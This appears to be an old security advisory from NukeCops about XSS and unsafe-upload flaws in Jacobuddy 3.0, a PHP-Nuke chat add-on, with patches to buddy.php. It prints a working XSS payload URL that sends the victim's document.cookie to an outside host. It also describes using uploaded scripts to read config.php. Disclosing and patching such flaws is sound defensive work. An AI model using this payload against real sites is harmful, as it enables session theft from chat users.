Jacobuddy Cross Site Scripting (XSS) And Upload Exploit
Date: Saturday, March 01 @ 23:44:02 CET
Topic: Security


Officially Released For Publication by Computer Cops.

Jacobuddy a Javascript Real Time Chat Module is an independent add-on for the open source GNU/GPL content management system PHP-Nuke. Computer Cops has discovered that Jacobuddy version 3.0 is vulnerable to Cross Site Scripting (XSS) and file system manipulation. It is our belief to contact the author prior to a public posting, but in this case we have supplied a fix for both vulnerabilities of this addon.

The following URL is a sample of how Jacobuddy can be seeded with a XSS exploit within the message body:

http://www.laudanski.com/"style="background-image:url(javascript:nurl='http://www.laudanski.com/j.cgi?';nurl=nurl+document.cookie;document.URL=nurl)

The current unpatched version will automatically redirect the receiver's pop-up Jacobuddy message to another site grabbing their cookie information from the attacked site.

The patch for this is applied to the buddy.php file:

In the following function block:

function send($to, $to_userid, $message, $subject) {

Add the following line after the global statement:

$message = htmlspecialchars(strip_tags($message));

The next vulnerability is the infamous dcc file transfer within the buddy.php file.

Any file uploaded into the system can stay on the system. A malicious script can be generated to grab vital file system data like the php-nuke config.php file and turned into a text file for the malicious uploader to access. Computer Cops highly advises that the entire dcc function be removed from the file in addition to the dcc case block and $who_online clause for the dcc link.

Computer Cops will make an attempt to contact the vendor with this information.





This article comes from NukeCops
http://www.nukecops.com

The URL for this story is:
http://www.nukecops.com/modules.php?name=News&file=article&sid=84